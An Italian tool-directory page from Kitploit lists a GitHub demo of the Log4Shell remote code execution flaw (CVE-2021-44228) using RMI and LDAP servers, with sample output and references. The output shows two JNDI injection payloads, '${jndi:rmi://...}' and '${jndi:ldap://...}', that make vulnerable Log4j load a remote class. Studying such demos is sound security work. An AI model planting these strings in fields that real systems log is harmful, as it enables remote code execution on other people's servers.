Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44228-Demo — Apache Log4j2 CVE-2021-44228 RCE Demo con RMI e LDAP | Kitploit
Strumenti/GitHubGitHub/mzlogin/cve-2021-44228-demo
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso Remoto
GitHubmzlogin/cve-2021-44228-demo

CVE-2021-44228-Demo

Apache Log4j2 CVE-2021-44228 RCE Demo con RMI e LDAP

Vedi Repository
234 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44228-Demo

Esempio di iniezione remota di codice tramite RMI e LDAP sfruttando CVE-2021-44228.

root@kitploit:~
Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}

RmiServer e LdapServer richiedono Python3 per l'avvio.

Riferimenti

  • Riproduzione della vulnerabilità di esecuzione remota di codice in Apache Log4j2
  • Vulnerabilità ad alto rischio Log4j! Analisi delle cause specifiche! La prima in assoluto! e Vulnerabilità ad alto rischio Log4j (video supplementare)
  • Log4j Lookups
  • Apache Log4j2 dalla RCE al bypass di RC1
  • tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
  • PSA: Log4Shell and the current state of JNDI injection
Scarica lo strumento